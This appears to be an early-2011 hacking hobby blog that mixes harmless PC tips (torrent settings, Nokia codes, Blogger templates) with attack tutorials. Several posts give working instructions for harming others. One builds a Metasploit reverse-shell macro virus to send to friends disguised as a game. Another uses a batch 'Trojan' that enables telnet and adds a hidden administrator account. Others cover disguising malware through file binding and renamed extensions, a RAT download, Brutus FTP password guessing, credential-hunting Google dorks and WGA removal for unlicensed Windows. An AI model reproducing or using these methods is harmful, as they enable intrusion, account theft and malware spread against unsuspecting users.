Welcome To Hacker's Act.

Very Welcome . Not everything that can be counted counts, and not everything that counts can be counted. -Albert Einstein

What are Hacker's ?

Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. -Kevin Mitnick

YoungSters

Younger hackers are hard to classify. They're probably just as diverse as the old hackers are. We're all over the map. -Larry Wall

Hacker or Man ?

Man is the lowest-cost, 150-pound, nonlinear, all-purpose computer system which can be mass-produced by unskilled labor. -NASA in 1965

Thanks For Visiting-Come again.

All Hackers Are Born As Script Kiddies.. -ImI

Friday, January 21, 2011

Remove Windows Genuine notification.

Are ur brain extracted from the notification screen of  WINDOWS GENUINE ADVANTAGE . Let get a rid from it .

Disclaimer: This article is for informational and educational purpose only, as most information is found on various part of Internet. Readers should contacts Microsoft if their licensed or OEM software cannot be validated or purchase genuine software.

Microsoft has released WGA Notifications application which effectively turned Microsoft Windows operating system into a ‘nagware’, with a “This copy of Windows is not genuine” warning. What the Windows Genuine Advantage Notifications application does what it will check your Microsoft Windows XP validity. If it found that the copy of Windows XP is not validated, not genuine, counterfeit, unlicensed, pirated, illegal, unauthorised or simply failed the Windows Genuine Advantage validation process, then the notification messages will appear at various places and time.

When you log on to a non-genuine copy of Windows XP, the following notification error message “This copy of Windows is not genuine” will pop-up on the logon process


And the nicely said “You may be a victim of software counterfeiting” message on the bottom right corner of log-in screen:
Microsoft allows Windows faithfuls to have 2 options: Get Genuine or Resolve Later. Click on Resolve Later will temporarily bypass the notification and let you login into and use Windows nagged with notification icon and messages, which will randomly appear as balloon notification message with an icon in the notification area (system tray).

Clicking on the balloon notification or the notification area icon will lead you to the Windows Genuine Advantage Validation Failure Web page that contains the specifics of the validation failure and the steps that you can take to make the operating system genuine.
To get rid of the WGA notifications that intends to remind you that your Windows is not validated, you can buy a validly licensed copy of genuine Microsoft Windows.
With new release of  WGA, some methods no longer works, and some has been updated. Several methods that has certain success on certain people, you may try until you success.
Official Method by Microsoft – more information here.
  1. Lauch Windows Task Manager.
  2. End wgatray.exe process in Task Manager.
  3. Restart Windows XP in Safe Mode.
  4. Delete WgaTray.exe from c:\Windows\System32.
  5. Delete WgaTray.exe from c:\Windows\System32\dllcache.
  6. Lauch RegEdit.
  7. Browse to the following location:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
    Windows NT\CurrentVersion\Winlogon\Notify
  8. Delete the folder ‘WgaLogon’ and all its contents
  9. Reboot Windows XP.
Note: 1.With this method, you may be prompted to install WGA Notifications again which can still be unselected.
                                                                                         (SOURCE TAKEN MAY SOME DEFECT)

Saturday, January 15, 2011

Windows CE

What is Windows CE ?

Windows CE (also known officially as Windows Embedded Compact or Windows Embedded CE post version 6.0, and sometimes abbreviated WinCE) is an operating system developed by Microsoft for minimalistic computers and embedded systems. Windows CE is a distinct operating system and kernel, rather than a trimmed-down version of desktop Windows. It is not to be confused with Windows XP Embedded which is NT-based.

Microsoft licenses Windows CE to OEMs and device makers. The OEMs and device makers can modify and create their own user interfaces and experiences, while Windows CE provides the technical foundation to do so.

Windows CE is supported on Intel x86 and compatibles, MIPS, ARM, and Hitachi SuperH processors.

Thursday, January 13, 2011

Less hard-disk

Today , I am with some special thing that is FREE ONLINE STORAGE with idrive upto 5 GB.
IF U WANT THIS FREE STORAGE .
  • BELOW IDRIVE BASIC CLICK TO SIGN UP .
  • WHEN SIGN UP COMPELETED IT ASK U 4 DOWNLOAD THE THE IDRIVE CLASSIC.CLICK ON IT TO DOWNLOAD.
  • AS THE DOWNLOAD COMPLETED JUST INSTALL THE APP. INTO UR PC.
  • AUTOMATICALLY IT OPENS. 
  • ENTER THERE UR USERNAME/EMAIL ID AND PASSWORD.
  • THEN CLICK CONNECT.
  • THEN IF A NEW SCREEN OPENS JUST CLICK CONTINUE WITHOUT DOING ANY CHANGE .
ENJOY BUDDY UR 5 GB STORAGE .............

Wednesday, January 12, 2011

Create Undectable Macro Virus for Windows OS

We use Metasploit Linux version to create virus or handle all remote connections.

Download Link: www.metasploit.com

Action: When any user runs the word file, we get command prompt with full administrative
rights to format any drive, copy personal information.
Requirement:

1. Linux Machine (To generate virus and to listen connections)
2. Windows Machine (To embedd VBA code into word file)

Type following commands at Linux shell prompt:

# cd Desktop
# cd framework32
# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=4444 V>/root/vbvirus.txt
 

Note: LHOST=192.168.1.8 is our linux machine ip address.
          LPORT=4444 is a local port for communication.

Just copy vbvirus.txt file in pen drive and goto another windows system where office 2003
installed. after we open MS WORD 2003 and select tools options select Macro select
Visual basic editor

After select File menu Import file select Vbvirus.txt
Save the file and exit and send to ur friends. Say this is good macro game.

To handle Windows command prompt at Linux side:
Open Linux Shell prompt and type following commands:

# cd Desktop
# cd framework32
#./msfconsole

 
use exploit/multi/handler
> set payload windows/shell/reverse_tcp
> set LHOST 192.168.1.8
> set LPORT 4444
> set exitonsession TRUE
>exploit

Linux is ready to accept windows command prompt for remote control any system.

Advantage:
 
Fully undetectable for all anti virus’s.
POC:
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.139:4444 -> 192.168.1.8:4444)
Microsoft Windows XP [Version 5.1.2600]
(
C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32

Want vedio help:- http://thesecretofhacking.com/vd/ch3/cs3

Tuesday, January 11, 2011

Watch TV without TV tuner

U want to see ur TV at ur computer . But  unfortunately u don't have TV TUNER . Don't be sad . A very good Live TV player is Readon Player 7.2.
Download me 

Monday, January 10, 2011

Hacking tools

Here is a kit of hacker with many essential tools .

Download me (56.1 MB)

Passwaord:- The7thSage


(NOTE:-May contain virus.So first unable it and then install)

Speed ur torrents

Step by Step markings:----

First go to Options>Preferences>Network

1. Under ‘Port used for incomming connections‘ enter any port number. It is best to use a port number above 10000. I use 45682.

2. Randomize port each time µtorrent starts: UNCHECKED
I leave this unchecked because I have a router. If you do not have a router or a firewall, and want extra security,check this option.

3. Enable UPnP port mapping (Windows Xp or later only): UNCHECKED
I leave this unchecked because I have experienced it slowing down speeds. It is not needed if you manually port forward.

4. Add µtorrent to Windows Firewall exceptions (Windows XP SP2 or later only): UNCHECKED (do this only if you have windows firewall disabled)

5. Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)

6. Protocol Encryption: ENABLED
I would recommend everyone to enable this. This can help increase speeds with many ISPs.

7. Allow incoming Legacy Connections: CHECKED

Options>Preferences>Torrents

1. Global Maximum Number of Connections: 130 (for 256k connection)
This number should not be set too low or the number of connections made to your torrents will be limited. Setting it too high may cause too much bandwidth to be used and can cause slowdowns.

2. Maximum Number of connected peers per torrent: 70 (for 256k connection)
If you see that the peers connected to a specific torrent are exactly this number, or very close, increase this number to improve speeds.

3. Number of upload slots per torrent: 3 (for 256k connection)
This depends on how much you want to upload to other users. Do not set too low or it may affect download speeds.

4. Use additional upload slots if upload speed <90%: CHECKED

5. Maximum number of active torrents: 2 (for 256k connection)

6. Maximum number of active downloads: 1 (for 256k connection)

Sunday, January 9, 2011

DOWNLOADS PART-1

Here i come with some basic download which any computer operator needed . Here it is :::::::::::::::::::::::::::------

  1. Top 100 Internet Tools   
  2. A great photo editor 
  3. Clarity in folders 
  4. Windows 7 Transformation Pack 
  5.  Download a whole website  
 

 

GAME BOOSTER

It takes a powerful machine to run the latest games available in the market. If you have too many processes running in the background then your game may start taking hiccups. To avoid this performance problems one require to stop the unwanted processes and close all the unneeded programs.

Game Booster can do all the things for you. It is an application which is dedicated to game lovers. It helps to improve your gaming experience. It can save a lot of time of your by stopping all unneeded programs and services on a single click of your mouse.

Game Booster also optimizes your primary memory for better gaming experience. In short it automates the process of optimizing your PC for gaming.

DOWNLOAD GAME BOOSTER (6.46 MB)

Download Opera 11 for Windows & Linux

The final version of Opera 11 just came out with many new features and enhancements. Improved address bar, Mouse gestures, Tab grouping, Pinned tab, Automatic updates are few of the most noticeable features in the new Opera 11.
  One more important feature  is its ability to run on external devices. While installing the browser you can select to install it on external devices. Which makes it a portable  browser and you can carry it in your Pen Drive with you. Just click on the options button while installing and select install for external device in the next screen.
Download opera 11 for windows (7.1 MB)
          OR
Download it for LINUX 

Nortan Internat securiy 2011-(90 day license)

Update : This is an OEM setup installer for Norton Internet Security 2011 that norton has released in conjunction with microsoft.

After doing some research i realized that Norton is giving away free 3 months license to evryone who downloads and installs norton internet security 2011.
Now there is no need to search for rapidshare links or torrents for Norton Internet Security 2011. You can get it legally for free.

In order to download and install norton 2011 internet security you just need to click here.

NOTE:-A one year license for Norton Internet Security 2011 costs 39$ in US or about Rs.1050/- in India. But with the download link given above you may get it for free and use the full working version for next 3 months.(may be valid for some )
 

Saturday, January 8, 2011

Password Cracking-2

Dictionary Attacks

Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus/ .

1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.
3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.

4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists athttp://packetstormsecurity.org/Crackers/wordlists/ . Below are examples of what a username and password list might look like.
8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.
9. If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.
10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.

11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.

Friday, January 7, 2011

password cracking

Before we get into cracking passwords with programs, I will explain a couple old-fashioned ways to obtain someone’s password.
 
• Social Engineering – Social engineering is when a hacker takes advantage of trusting human beings to get information from them. For example, if the hacker was trying to get the password for a co-workers computer, he (Even though I use “he”, hackers are of both genders, and I just chose to use “he” in these examples.) could call the co-worker pretending to be from the IT department. The conversation could be something like:
                         "Bob- “Hello Suzy. My name is Bob and I’m from the IT department. We are currently attempting to install a new security update on your computer, but we can’t seem to connect to the user database and extract your user information. Would you mind helping me out and letting me know your password before my boss starts breathing down my neck? It’s one of those days, ya’ know?”
                            Suzy would probably feel bad for Bob and let him know her password without any hesitation. BAM! She got social engineered. Now the hacker can do whatever he pleases with her account.\

• Shoulder surfing – Shoulder surfing is exactly what it sounds like. The hacker would simply attempt to look over your shoulder as you type in your password. The hacker may also watch weather you glance around your desk, looking for a written reminder or the written password itself.

• Guessing – If you use a weak password, a hacker could simple guess it by using the information he knows about you. Some examples of this are: date of birth, phone number, favorite pet, and other simple things like these.

Now that we have the simple low-tech password cracking techniques out of the way, let’s explore some high-tech techniques.
                                                     DICTIONARY ATTACKS 

A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary is used against a password database. Strong passwords usually aren’t vulnerable to this kind of attack. In the following example, I will use Brutus, a very common password cracker, to show a dictionary attack against an ftp server. Brutus is a Windows only program, but at the end of this chapter I will list a couple more password crackers, some of which are made for Mac, Windows, and Linux.

Thursday, January 6, 2011

NOKIA mobile secret codes

(NOTE:-It is taken from a source may be wrong)

On the main screen type
 
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN
adapter. This is available only in the newer devices that
support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you
may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was
purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation.
Increase signal strength, better signal reception. It also
help if u want to use GPRS and the service is not
responding or too slow. Phone battery will drain faster
though.
*#3370* - (EFR) deactivation. Phone will automatically
restart. Increase battery life by 30% because phone
receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will
automatically restart
If you forgot wallet code for Nokia S60 phone, use this
code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask
you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of
wallet.

Get ur software own

Many times I saw peoples asking for software . Are yaar hum bhi to wo software kahin na khani se to late honge .So, my advice is not depend on others .FIND UR SOFTWARE OWN , HERE IS SOME FINDING TRICKS:(READ IT FULLY)
Google hacking is a term that refers to the act of creating complex search engine queries in order
to filter through large amounts of search results for information related to computer security. In
its malicious format it can be used to detect websites that are vulnerable to numerous exploits
and vulnerabilities as well as locate private, sensitive information about others, such as credit
card numbers, social security numbers, and passwords.
Google hacking is a process to find any file as soon as possible with help of some advanced
parameter.
For example we need AVG antivirus or any software, and we have 10-15 second so we use
google advanced parameter, to search from rapidshare.com

site:rapidshare.com avg 


Other Parameters:
 intitle:admbook intitle:version filetype:php
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"

 
allinurl:auth_user_file.txt

 
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email
addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger
than others, all are fun, and all belong to googledorks. =)


intitle:"Index of" config.php
 
This search brings up sites with "config.php" files. To skip the technical discussion, this
configuration file contains both a username and a password for an SQL database. Most sites with
forums run a PHP message base. This file gives you the keys to that forum, including FULL
ADMIN access to the database.

eggdrop filetype:user user

These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots,
suffice it to say that this file contains usernames and passwords for IRC users.
The syntax “link:” will produce a list of webpages that have a link to a specified webpage.

For example: link:www.hak9.com will create a Google list of websites with links to
www.hak9.com.

The Google syntax “phonebook” searches for U.S. street addresses and phone number
information. For Example: “phonebook:James+FL” will list down all names of person
having “James” in their names and located in “Florida (FL)”.

Wednesday, January 5, 2011

Windows password hacking


                  Password Hacking through Sniffing*



Q=>What is Sniffing?
Ans=>   Sniffing is another technique to use internally. A sniffer or packet capture utility is able to
capture any traffic travelling along the network segment to which it is connected. We
normally set up sniffers throughout the organization to capture network traffic, hoping to
identify valuable information such as user IDs and passwords. We use sniffing to
passively capture data being sent across the internal network. Laptops are usually the
ideal platform since they are portable and easy to conceal. The system does not even need
an IP address since it passively captures the traffic. The sniffing machine copies the data
without modifying its contents and is difficult to detect even with sophisticated intrusion
detection software. There are programs, such as AntiSniff, that have some success in
detecting sniffers.
Switched Ethernet environments reduce the risk of packet capture. Since the sniffer is
able to capture traffic only on its same network segment, a sniffer in a switched
environment can see only traffic destined for it. However, in a shared environment or
mixed environment, sniffers can be very useful for capturing valuable traffic. In addition,
dsniff, written by Dug Song, is able to sniff across switches. The techniques dsniff uses to
sniff on switched segments can cause denial-of-service conditions and therefore should
be used cautiously during penetration testing.

Top 4 Sniffers:

Ethreal
dsniff
Ettercap NG 0.7.1
Hunt 1.5

For video help:-Click me

Tuesday, January 4, 2011

How to apply ur templates to blogs

To make this template fully display and function, you are invited to follow the steps below:

1. Sign into your Blogger's dashboard, choose the blog's "layout" .
2. Under "Layout" tab, choose the "Edit HTML" option.
3. You might need to backup the template before you upload it, click "Download Full Template" to save the template file into the computer.
4. You can see the word "Upload a template from a file on your hard drive.", click "browse" and choose the "(template name).xml" file.
5. Click on "Upload" button to upload the template to your blog.
6. Enjoy!


Set up the Top Navigation Menu
==============================

Go to ¡®Layout¡¯, choose the ¡®Edit HTML¡¯, press [CTRL+F3] to find the code below and change it to your link according to the corresponding link name.

<a href='YOUR-LINK-HERE'>

'Save Template' to achieve top navigation menu's settings.


Set up the Header RSS Subscribe
===============================

Access into ¡®Layout¡¯ and under the ¡®Edit HTML¡¯ mode, press [CTRL+F3] to find the code below and edit it with corresponding item:

<a href='/feeds/posts/default'>

'Save Template' to achieve header RSS subscription's settings.



Enjoy Blogging!

Change Your IP Temporaraly to avoid interference

Change Your Ip In Less Then 1 Minute(windows XP and vista only)

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.Change Your Ip In Less Then 1 Minute

Monday, January 3, 2011



                                            Denial Of Service (DoS) Attacks :-

A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:-

1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.

3) SYN - Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

4) Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

5) Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.

6) UDP -

Flood Attack :- Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.
www.allih1.com

Saturday, January 1, 2011

HOW TO SPREAD VIRUS


                                    How to Spread Virus:
 
Send email after:

1. File Binding.
2. Hide exe into excel file.
3. Office 2003 Macro bypasser:
4. File name phising
5. False Linking.

1. File Binding):
 
File binding is a process to bind two exe files into one. When binded exe is exeuted, both the
exe’s are executed at the same time.
We have 2 default binder programs:

1. iexpress.exe (ship with xp+vista)
 
Goto run and type: iexpress

and select 1 option : create a self extraction directive file next select 1st
option next give package title-my prg or any next select no prompt select donot
display a license add 2 files (one virus or Trojan file, and 2 any software like winamp.exe)
next select install program winamp.exe and post install command select
server.exe(virus) Selct default next no message select Browse to save a final exe file.
And next final.exe created.

When we are binding the exe’s, the limitation is that it makes a third type of icon which can
be detected so to change icon we use resource hacker program for getting the orginal icon.To
change icon use resource hacker program.

Don’t use custom binders from internet because they are detected as virus by many anti
viruses.

Limitation of iexpress:
Iexpress can only bind exe file format into final exe, not any other extension like excel, PDF
file.

2. Hide exe into excel file.
then
Extract excelhack.exe to c drive and put 2 files, one sever.exe(virus) and another is excel
file(bill.xls) in the same folder then open dos prompt and then type the command given below:

c:\>excelhack.exe bill.xls server.exe [enter]
 
Limitation of this exploit: Work only in office 2003

3. Office 2003 Macro bypasser:
 
and send it to the targeted system which will enable macro feature, which will be helpful to infect
victim system.
 
4. File name phising
 
Open Dos Prompt and just rename the file and create a archive with help of winrar software.
C:\> ren server.exe photo1226.jpeg-www.myspace.com
 
5. False Linking.
 
It is one of the special methods of infecting a target system, where we change the name of
server.exe into bill.xls with the help of “ c:\> ren server.exe bill.xls”
But before that we make the shortcut of server.exe on same folder and after that open shortcut
property and set “ C:\windows\system32\cmd.exe /c bill.xls” .
Then if anybody clicks on bill.xls.lnk it will automatically tun the server.exe which will
infect the target system easily.

Create TROJAN.....YES

We can create Trojan viruses with help of Trojan builders(RAT):
 
Best tools to create own Trojan (client) part and to control all infected machines are:
1. Lost door v3.0 Stable*
2. NetBus 2.0 Pro

 
1.Lost Door : Lost door is a remote administration tool for Microsoft Windows operating
systems. You can control and monitor remote computer easily and view what user does. Illegal
usage of this software is not allowed. Coder and related site is not responsible for any abuse of
the software.

Download: www.thesecretofhacking.com/sw/ch2/lostdoor.rar

Features:
[+] Reverse Connection
[+] Webcam Shot
[+] Date& time Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Dos command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server remover
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] Multilanguage
[+] Invisible in Searching Files
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms Has Been Modified
[+] News Navigator was Added
[+] Server Size (120kb)

How to create Trojan virus with help of Lost door?
 
1. For LAN(Local area Network)
2. For WAN(Internet)
1. For LAN:

Open Lost door click on Create server button and then a dialog box appears where you
mention server own ip address---then…create)))) then server.exe will be created on lost door
folder .. then send this exe to target system for remote control.
For establishing the connection from server to victim.
Start your server>> just click start listen Button.
To control the victim system, right click and connect..

ENJOY

Hack Windows XP with ur own TROJAN

(Hack any windows XP computer)

Telnet Trojan Target : All windows XP machines.
Features: Fully undetectable for all antiviruses.

----------------------------------------------------------------------------------------
echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user leoimpact /add
net user leoimpact leo123
net localgroup administrators leoimpact /add
exit

----------------------------------------------------------------------------------------

Write the above code in the notepad and save as myvirus.bat and send it through email, pen
drive, etc to other system for remote control.

Action:  After executing the above script a user leoimpact is created and its password is: leo123 and
then telnet port will open with full administrative rights.

Note: The limitation of the above script is that the user will be visible on the target system. But
we can hide the user with help of downloading and executing the
www.thesecretofhacking.com/sw/ch2/hide.reg

This script has another limitation which shows a prompt which may caution the target system
user but we can hide prompt window with help of BAT to EXE converter.

[Download link: www.thesecretofhacking.com/sw/ch2/bat.zip ]

How to Connect Remote Machine:

C:\> Telnet remotemachineipaddress [enter]